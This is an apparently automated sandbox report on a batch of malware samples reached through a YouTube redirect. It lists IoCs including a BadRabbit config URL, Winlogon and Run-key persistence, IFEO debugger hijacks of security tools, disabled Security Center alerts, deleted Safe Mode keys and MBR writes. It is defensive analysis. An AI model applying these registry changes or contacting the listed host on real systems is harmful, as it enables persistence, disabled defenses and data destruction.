Analysis
-
max time kernel
997s -
max time network
997s -
platform
windows10-ltsc_2021_x64 -
resource
win10ltsc2021-20250410-es -
resource tags
arch:x64arch:x86image:win10ltsc2021-20250410-eslocale:es-esos:windows10-ltsc_2021-x64systemwindows -
submitted
16/04/2025, 08:58
Static task
static1
URLScan task
urlscan1
Behavioral task
behavioral1
Sample
https://www.youtube.com/redirect?event=video_description&redir_token=QUFFLUhqbTNTS1V0bDdKNTZVbmljSExkcUVpQjBtOVpNUXxBQ3Jtc0tuWVVjcGZVTzBqMHo3cE41bUFlckdSRUVHRU93WjdwbUo1dUFrUUNxR1htUzlCdktsT3VodURGdmFMYWJKbXN6dFd3cFR3elJkcXRHX0lOUFFCY3FYRzBBMDBiREpfdTR2SzBBc3Z4S3J4MV9Xd295WQ&q=https%3A%2F%2Fenderman.ch%2F&v=xwJJkvIsEJQ
Resource
win10ltsc2021-20250410-es
Behavioral task
behavioral2
Sample
https://www.youtube.com/redirect?event=video_description&redir_token=QUFFLUhqbTNTS1V0bDdKNTZVbmljSExkcUVpQjBtOVpNUXxBQ3Jtc0tuWVVjcGZVTzBqMHo3cE41bUFlckdSRUVHRU93WjdwbUo1dUFrUUNxR1htUzlCdktsT3VodURGdmFMYWJKbXN6dFd3cFR3elJkcXRHX0lOUFFCY3FYRzBBMDBiREpfdTR2SzBBc3Z4S3J4MV9Xd295WQ&q=https%3A%2F%2Fenderman.ch%2F&v=xwJJkvIsEJQ
Resource
win11-20250411-es
General
-
Target
https://www.youtube.com/redirect?event=video_description&redir_token=QUFFLUhqbTNTS1V0bDdKNTZVbmljSExkcUVpQjBtOVpNUXxBQ3Jtc0tuWVVjcGZVTzBqMHo3cE41bUFlckdSRUVHRU93WjdwbUo1dUFrUUNxR1htUzlCdktsT3VodURGdmFMYWJKbXN6dFd3cFR3elJkcXRHX0lOUFFCY3FYRzBBMDBiREpfdTR2SzBBc3Z4S3J4MV9Xd295WQ&q=https%3A%2F%2Fenderman.ch%2F&v=xwJJkvIsEJQ
Malware Config
Extracted
http://78.26.187.35/soft-usage/favicon.ico?0=1200&1=ONBLRSLW&2=i-s&3=61&4=9200&5=6&6=2&7=919041&8=3082
Signatures
-
BadRabbit
Ransomware family discovered in late 2017, mainly targeting Russia and Ukraine.
-
Badrabbit family
-
Disables service(s) 3 TTPs
-
Modifies WinLogon for persistence 2 TTPs 3 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-3457531954-2054407110-1019940402-1000\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "C:\\Users\\Admin\\AppData\\Roaming\\vbvxcn.exe" vbvxcn.exe Set value (str) \REGISTRY\USER\S-1-5-21-3457531954-2054407110-1019940402-1000\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "C:\\Users\\Admin\\Downloads\\MalwareDatabase-master\\MalwareDatabase-master\\ransomwares\\[email protected]" [email protected] Set value (str) \REGISTRY\USER\S-1-5-21-3457531954-2054407110-1019940402-1000\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "C:\\Users\\Admin\\AppData\\Roaming\\gog.exe" [email protected] -
Windows security bypass 2 TTPs 3 IoCs
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\FirewallDisableNotify = "1" antivirus-platinum.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\UpdatesDisableNotify = "1" antivirus-platinum.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\AntiVirusDisableNotify = "1" antivirus-platinum.exe -
Checks for common network interception software 1 TTPs
Looks in the registry for tools like Wireshark or Fiddler commonly used to analyze network activity.
-
Enumerates VirtualBox registry keys 2 TTPs 1 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VBoxGuest [email protected] -
Blocklisted process makes network request 1 IoCs
flow pid Process 525 5176 mshta.exe -
Disables RegEdit via registry modification 1 IoCs
description ioc Process Set value (int) \REGISTRY\USER\S-1-5-21-3457531954-2054407110-1019940402-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryTools = "1" antivirus-platinum.exe -
Downloads MZ/PE file 3 IoCs
flow pid Process 454 4716 Downloadly.exe 454 4716 Downloadly.exe 454 4716 Downloadly.exe -
Drops file in Drivers directory 4 IoCs
description ioc Process File created C:\Windows\system32\drivers\etc\host_new [email protected] File created C:\Windows\System32\drivers\etc\hosts [email protected] File opened for modification C:\Windows\system32\drivers\etc\hosts [email protected] File opened for modification C:\Windows\System32\drivers\etc\hosts [email protected] -
Event Triggered Execution: Image File Execution Options Injection 1 TTPs 64 IoCs
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\av360.exe [email protected] Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Cl.exe\Debugger = "svchost.exe" [email protected] Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Security Center.exe [email protected] Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\csc.exe [email protected] Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\securitysoldier.exe\Debugger = "svchost.exe" [email protected] Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\av360.exe\Debugger = "svchost.exe" [email protected] Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\SaveKeep.exe\Debugger = "svchost.exe" [email protected] Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Anti-Virus Professional.exe [email protected] Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\~2.exe [email protected] Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\qh.exe [email protected] Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\SaveDefense.exe [email protected] Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\AntispywarXP2009.exe [email protected] Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\AlphaAV [email protected] Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\gav.exe [email protected] Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\xpdeluxe.exe\Debugger = "svchost.exe" [email protected] Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\protector.exe\Debugger = "svchost.exe" [email protected] Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\smrtdefp.exe [email protected] Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\homeav2010.exe [email protected] Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\spywarexpguard.exe [email protected] Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\QuickHealCleaner.exe [email protected] Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\rwg\Debugger = "svchost.exe" [email protected] Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options [email protected] Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\AntivirusPlus.exe [email protected] Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\frmwrk32.exe [email protected] Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Quick Heal.exe [email protected] Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\TrustWarrior.exe [email protected] Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\securitysoldier.exe [email protected] Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\pc.exe [email protected] Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\AntivirusPlus.exe\Debugger = "svchost.exe" [email protected] Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\pctsAuxs.exe [email protected] Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\SafetyKeeper.exe\Debugger = "svchost.exe" [email protected] Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\~1.exe\Debugger = "svchost.exe" [email protected] Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\windows Police Pro.exe [email protected] Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Quick Heal.exe\Debugger = "svchost.exe" [email protected] Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\AntiVirus_Pro.exe\Debugger = "svchost.exe" [email protected] Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\spywarexpguard.exe\Debugger = "svchost.exe" [email protected] Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\AntivirusPro_2010.exe\Debugger = "svchost.exe" [email protected] Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\secureveteran.exe\Debugger = "svchost.exe" [email protected] Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\qh.exe\Debugger = "svchost.exe" [email protected] Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\winav.exe\Debugger = "svchost.exe" [email protected] Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\tapinstall.exe\Debugger = "svchost.exe" [email protected] Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\frmwrk32.exe\Debugger = "svchost.exe" [email protected] Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\pctsTray.exe [email protected] Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ozn695m5.exe [email protected] Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\SafetyKeeper.exe [email protected] Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\winav.exe [email protected] Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\AVCare.exe\Debugger = "svchost.exe" [email protected] Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\AntiVirus_Pro.exe [email protected] Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\pctsSvc.exe\Debugger = "svchost.exe" [email protected] Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\pctsGui.exe [email protected] Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\pctsTray.exe\Debugger = "svchost.exe" [email protected] Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\secureveteran.exe [email protected] Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\SaveArmor.exe [email protected] Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\tsc.exe [email protected] Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\pctsSvc.exe [email protected] Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\pctsGui.exe\Debugger = "svchost.exe" [email protected] Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\QuickHealCleaner.exe\Debugger = "svchost.exe" [email protected] Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\AntivirusXP.exe\Debugger = "svchost.exe" [email protected] Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\smrtdefp.exe\Debugger = "svchost.exe" [email protected] Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\PC_Antispyware2010.exe [email protected] Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\gbn976rl.exe\Debugger = "svchost.exe" [email protected] Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\AntispywarXP2009.exe\Debugger = "svchost.exe" [email protected] Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\brastk.exe\Debugger = "svchost.exe" [email protected] Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\AntivirusXP [email protected] -
Stops running service(s) 4 TTPs
-
Checks BIOS information in registry 2 TTPs 2 IoCs
BIOS information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion RegClean.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosDate RegClean.exe -
Checks computer location settings 2 TTPs 15 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-3457531954-2054407110-1019940402-1000\Control Panel\International\Geo\Nation [email protected] Key value queried \REGISTRY\USER\S-1-5-21-3457531954-2054407110-1019940402-1000\Control Panel\International\Geo\Nation [email protected] Key value queried \REGISTRY\USER\S-1-5-21-3457531954-2054407110-1019940402-1000\Control Panel\International\Geo\Nation [email protected] Key value queried \REGISTRY\USER\S-1-5-21-3457531954-2054407110-1019940402-1000\Control Panel\International\Geo\Nation GLB2268.tmp Key value queried \REGISTRY\USER\S-1-5-21-3457531954-2054407110-1019940402-1000\Control Panel\International\Geo\Nation Downloadly.exe Key value queried \REGISTRY\USER\S-1-5-21-3457531954-2054407110-1019940402-1000\Control Panel\International\Geo\Nation [email protected] Key value queried \REGISTRY\USER\S-1-5-21-3457531954-2054407110-1019940402-1000\Control Panel\International\Geo\Nation x2s443bc.cs1.tmp Key value queried \REGISTRY\USER\S-1-5-21-3457531954-2054407110-1019940402-1000\Control Panel\International\Geo\Nation MassiveInstaller.tmp Key value queried \REGISTRY\USER\S-1-5-21-3457531954-2054407110-1019940402-1000\Control Panel\International\Geo\Nation downloadly_installer.tmp Key value queried \REGISTRY\USER\S-1-5-21-3457531954-2054407110-1019940402-1000\Control Panel\International\Geo\Nation [email protected] Key value queried \REGISTRY\USER\S-1-5-21-3457531954-2054407110-1019940402-1000\Control Panel\International\Geo\Nation NavaShield.exe Key value queried \REGISTRY\USER\S-1-5-21-3457531954-2054407110-1019940402-1000\Control Panel\International\Geo\Nation [email protected] Key value queried \REGISTRY\USER\S-1-5-21-3457531954-2054407110-1019940402-1000\Control Panel\International\Geo\Nation Free YouTube Downloader.exe Key value queried \REGISTRY\USER\S-1-5-21-3457531954-2054407110-1019940402-1000\Control Panel\International\Geo\Nation 302746537.exe Key value queried \REGISTRY\USER\S-1-5-21-3457531954-2054407110-1019940402-1000\Control Panel\International\Geo\Nation [email protected] -
Executes dropped EXE 53 IoCs
pid Process 548 ska2pwej.aeh.tmp 4728 walliant.exe 2800 walliant.exe 4012 x2s443bc.cs1.tmp 4716 Downloadly.exe 4004 Downloadly.exe 1080 MassiveInstaller.exe 4860 MassiveInstaller.tmp 5312 Massive.exe 5316 crashpad_handler.exe 3884 downloadly_installer.exe 1156 downloadly_installer.tmp 4248 downloadly_installer.exe 2612 downloadly_installer.tmp 2780 [email protected] 4700 [email protected] 3008 usеrinit.exe 1984 [email protected] 2988 302746537.exe 3100 antivirus-platinum.exe 4796 [email protected] 4556 [email protected] 4576 [email protected] 4104 avpc2009.exe 3676 [email protected] 5212 [email protected] 1464 6AdwCleaner.exe 2880 6AdwCleaner.exe 5204 [email protected] 1660 is-EDQVV.tmp 5916 wizard.exe 4012 [email protected] 6040 [email protected] 5852 [email protected] 2676 NavaShield.exe 1556 [email protected] 1012 NavaBridge.exe 4592 NavaDebugger.exe 4080 [email protected] 5124 [email protected] 5676 vbvxcn.exe 5228 [email protected] 1948 vav.exe 2724 [email protected] 392 [email protected] 1720 Free YouTube Downloader.exe 5380 Endermanch@RegistryCleaner_SOReferral.exe 2936 GLB2268.tmp 2584 RegClean.exe 1856 [email protected] 1532 B38D.tmp 64 [email protected] 4996 Box.exe -
Impair Defenses: Safe Mode Boot 1 TTPs 7 IoCs
description ioc Process Key deleted \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SafeBoot\Minimal\CBDHSvc [email protected] Key deleted \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SafeBoot\Minimal\WinDefend [email protected] Key deleted \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SafeBoot\Minimal\UserManager [email protected] Key deleted \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SafeBoot\Minimal\SerCx2.sys [email protected] Key deleted \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SafeBoot\Minimal\ProfSvc [email protected] Key deleted \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SafeBoot\Minimal\Power [email protected] Key deleted \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SafeBoot\Minimal\iai2c.sys [email protected] -
Loads dropped DLL 64 IoCs
pid Process 1832 msedge.exe 4728 walliant.exe 4728 walliant.exe 4728 walliant.exe 4728 walliant.exe 4728 walliant.exe 4728 walliant.exe 4728 walliant.exe 4728 walliant.exe 4728 walliant.exe 4728 walliant.exe 4728 walliant.exe 4728 walliant.exe 4728 walliant.exe 4728 walliant.exe 4728 walliant.exe 4728 walliant.exe 4728 walliant.exe 4728 walliant.exe 4728 walliant.exe 4728 walliant.exe 4728 walliant.exe 4716 Downloadly.exe 4716 Downloadly.exe 5312 Massive.exe 5312 Massive.exe 5312 Massive.exe 5312 Massive.exe 5312 Massive.exe 520 regsvr32.exe 2832 regsvr32.exe 3100 antivirus-platinum.exe 4104 avpc2009.exe 4104 avpc2009.exe 4104 avpc2009.exe 2676 NavaShield.exe 2676 NavaShield.exe 2676 NavaShield.exe 2676 NavaShield.exe 2676 NavaShield.exe 2676 NavaShield.exe 1012 NavaBridge.exe 1012 NavaBridge.exe 1012 NavaBridge.exe 1012 NavaBridge.exe 1012 NavaBridge.exe 4592 NavaDebugger.exe 1452 regsvr32.exe 2936 GLB2268.tmp 2936 GLB2268.tmp 2936 GLB2268.tmp 2936 GLB2268.tmp 2936 GLB2268.tmp 2936 GLB2268.tmp 2936 GLB2268.tmp 2936 GLB2268.tmp 2936 GLB2268.tmp 2936 GLB2268.tmp 2936 GLB2268.tmp 2936 GLB2268.tmp 2936 GLB2268.tmp 2936 GLB2268.tmp 2936 GLB2268.tmp 2936 GLB2268.tmp -
Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Windows security modification 2 TTPs 3 IoCs
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\FirewallDisableNotify = "1" antivirus-platinum.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\UpdatesDisableNotify = "1" antivirus-platinum.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\AntiVirusDisableNotify = "1" antivirus-platinum.exe -
Adds Run key to start application 2 TTPs 12 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-3457531954-2054407110-1019940402-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Walliant = "C:\\Users\\Admin\\AppData\\Local\\Programs\\Walliant\\walliant.exe" ska2pwej.aeh.tmp Set value (str) \REGISTRY\USER\S-1-5-21-3457531954-2054407110-1019940402-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Downloadly = "\"C:\\Users\\Admin\\Programs\\Downloadly\\Downloadly.exe\"" x2s443bc.cs1.tmp Set value (str) \REGISTRY\USER\S-1-5-21-3457531954-2054407110-1019940402-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Antivirus = "\"C:\\Program Files (x86)\\AnVi\\avt.exe\" -noscan" [email protected] Set value (str) \REGISTRY\USER\S-1-5-21-3457531954-2054407110-1019940402-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\AntiVirus Pro 2017 = "C:\\Users\\Admin\\Downloads\\MalwareDatabase-master\\MalwareDatabase-master\\rogues\\[email protected]" [email protected] Set value (str) \REGISTRY\USER\S-1-5-21-3457531954-2054407110-1019940402-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Registry Cleaner = "C:\\PROGRA~2\\REGIST~1\\Regclean.exe" GLB2268.tmp Set value (str) \REGISTRY\USER\S-1-5-21-3457531954-2054407110-1019940402-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Registry Cleaner = "C:\\PROGRA~2\\REGIST~1\\RegClean.exe" RegClean.exe Set value (str) \REGISTRY\USER\S-1-5-21-3457531954-2054407110-1019940402-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\AdwCleaner = "\"C:\\Users\\Admin\\AppData\\Local\\6AdwCleaner.exe\" -auto" 6AdwCleaner.exe Set value (str) \REGISTRY\USER\S-1-5-21-3457531954-2054407110-1019940402-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\NavaShield = "c:\\Nava Labs\\Nava Shield\\navashield.exe" [email protected] Set value (str) \REGISTRY\USER\S-1-5-21-3457531954-2054407110-1019940402-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Antivirus = "C:\\Program Files (x86)\\VAV\\vav.exe" vav.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\Antivirus = "C:\\Program Files (x86)\\VAV\\vav.exe" vav.exe Set value (str) \REGISTRY\USER\S-1-5-21-3457531954-2054407110-1019940402-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Free Youtube Downloader = "C:\\Windows\\Free Youtube Downloader\\Free Youtube Downloader\\Free YouTube Downloader.exe" [email protected] Set value (str) \REGISTRY\USER\S-1-5-21-3457531954-2054407110-1019940402-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\system = "C:\\Users\\Admin\\Downloads\\MalwareDatabase-master\\MalwareDatabase-master\\ransomwares\\[email protected]" [email protected] -
Checks for any installed AV software in registry 1 TTPs 1 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Eset\Nod\ [email protected] -
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Enumerates connected drives 3 TTPs 64 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
description ioc Process File opened (read-only) \??\J: wizard.exe File opened (read-only) \??\J: [email protected] File opened (read-only) \??\V: [email protected] File opened (read-only) \??\Q: wizard.exe File opened (read-only) \??\Q: [email protected] File opened (read-only) \??\G: wizard.exe File opened (read-only) \??\Y: wizard.exe File opened (read-only) \??\D: [email protected] File opened (read-only) \??\L: [email protected] File opened (read-only) \??\V: [email protected] File opened (read-only) \??\H: [email protected] File opened (read-only) \??\K: [email protected] File opened (read-only) \??\B: wizard.exe File opened (read-only) \??\K: wizard.exe File opened (read-only) \??\Z: [email protected] File opened (read-only) \??\G: [email protected] File opened (read-only) \??\O: [email protected] File opened (read-only) \??\U: [email protected] File opened (read-only) \??\L: [email protected] File opened (read-only) \??\A: wizard.exe File opened (read-only) \??\M: wizard.exe File opened (read-only) \??\X: [email protected] File opened (read-only) \??\H: wizard.exe File opened (read-only) \??\Q: [email protected] File opened (read-only) \??\R: [email protected] File opened (read-only) \??\S: [email protected] File opened (read-only) \??\X: wizard.exe File opened (read-only) \??\U: wizard.exe File opened (read-only) \??\T: [email protected] File opened (read-only) \??\Z: [email protected] File opened (read-only) \??\T: [email protected] File opened (read-only) \??\D: wizard.exe File opened (read-only) \??\O: wizard.exe File opened (read-only) \??\J: [email protected] File opened (read-only) \??\P: [email protected] File opened (read-only) \??\I: [email protected] File opened (read-only) \??\O: [email protected] File opened (read-only) \??\Y: [email protected] File opened (read-only) \??\H: [email protected] File opened (read-only) \??\R: [email protected] File opened (read-only) \??\U: [email protected] File opened (read-only) \??\X: [email protected] File opened (read-only) \??\T: wizard.exe File opened (read-only) \??\G: [email protected] File opened (read-only) \??\M: [email protected] File opened (read-only) \??\Z: wizard.exe File opened (read-only) \??\N: [email protected] File opened (read-only) \??\I: wizard.exe File opened (read-only) \??\L: wizard.exe File opened (read-only) \??\P: [email protected] File opened (read-only) \??\W: [email protected] File opened (read-only) \??\P: wizard.exe File opened (read-only) \??\S: wizard.exe File opened (read-only) \??\V: wizard.exe File opened (read-only) \??\I: [email protected] File opened (read-only) \??\N: [email protected] File opened (read-only) \??\R: wizard.exe File opened (read-only) \??\K: [email protected] File opened (read-only) \??\W: wizard.exe File opened (read-only) \??\M: [email protected] File opened (read-only) \??\S: [email protected] File opened (read-only) \??\W: [email protected] File opened (read-only) \??\Y: [email protected] File opened (read-only) \??\D: [email protected] -
Indicator Removal: File Deletion 1 TTPs
Adversaries may delete files left behind by the actions of their intrusion activity.
-
Maps connected drives based on registry 3 TTPs 2 IoCs
Disk information is often read in order to detect sandboxing environments.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\Disk\Enum [email protected] Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\disk\Enum\0 [email protected] -
Writes to the Master Boot Record (MBR) 1 TTPs 3 IoCs
Bootkits write to the MBR to gain persistence at a level below the operating system.
description ioc Process File opened for modification \??\PhysicalDrive0 [email protected] File opened for modification \??\PhysicalDrive0 [email protected] File opened for modification \??\PhysicalDrive0 [email protected] -
Drops file in System32 directory 28 IoCs
description ioc Process File opened for modification C:\Windows\SysWOW64\@VpnToastIcon.png wizard.exe File opened for modification C:\Windows\SysWOW64\SecurityAndMaintenance_Alert.png wizard.exe File created C:\Windows\SysWOW64\countly\userdetails.xml walliant.exe File opened for modification C:\Windows\system32\wbem\repository\MAPPING1.MAP svchost.exe File created C:\Windows\SysWOW64\vav.cpl vav.exe File opened for modification C:\Windows\SysWOW64\@WirelessDisplayToast.png wizard.exe File opened for modification C:\Windows\SysWOW64\DefaultAccountTile.png wizard.exe File opened for modification C:\Windows\SysWOW64\DesktopSpotlightToastIcon_Light.png wizard.exe File opened for modification C:\Windows\SysWOW64\MSDRM\MsoIrmProtector.doc wizard.exe File opened for modification C:\Windows\SysWOW64\MSDRM\MsoIrmProtector.ppt wizard.exe File created C:\Windows\SysWOW64\countly\device.xml walliant.exe File created C:\Windows\SysWOW64\countly\sessions.xml walliant.exe File opened for modification C:\Windows\system32\wbem\repository svchost.exe File opened for modification C:\Windows\system32\wbem\repository\INDEX.BTR svchost.exe File opened for modification C:\Windows\SysWOW64\@AudioToastIcon.png wizard.exe File opened for modification C:\Windows\SysWOW64\Bthprops\@BthpropsNotificationLogo.png wizard.exe File opened for modification C:\Windows\SysWOW64\DesktopSpotlightToastIcon_Dark.png wizard.exe File opened for modification C:\Windows\SysWOW64\MSDRM\MsoIrmProtector.xls wizard.exe File opened for modification C:\Windows\SysWOW64\countly\sessions.xml walliant.exe File opened for modification C:\Windows\system32\wbem\repository\WRITABLE.TST svchost.exe File opened for modification C:\Windows\system32\wbem\repository\OBJECTS.DATA svchost.exe File opened for modification C:\Windows\SysWOW64\@EnrollmentToastIcon.png wizard.exe File opened for modification C:\Windows\SysWOW64\SecurityAndMaintenance.png wizard.exe File opened for modification C:\Windows\SysWOW64\SecurityAndMaintenance_Error.png wizard.exe File created C:\Windows\SysWOW64\GLBSINST.%$D GLB2268.tmp File opened for modification C:\Windows\system32\wbem\repository\MAPPING2.MAP svchost.exe File opened for modification C:\Windows\system32\wbem\repository\MAPPING3.MAP svchost.exe File opened for modification C:\Windows\SysWOW64\@AppHelpToast.png wizard.exe -
Suspicious use of SetThreadContext 1 IoCs
description pid Process procid_target PID 4700 set thread context of 4632 4700 [email protected] 203 -
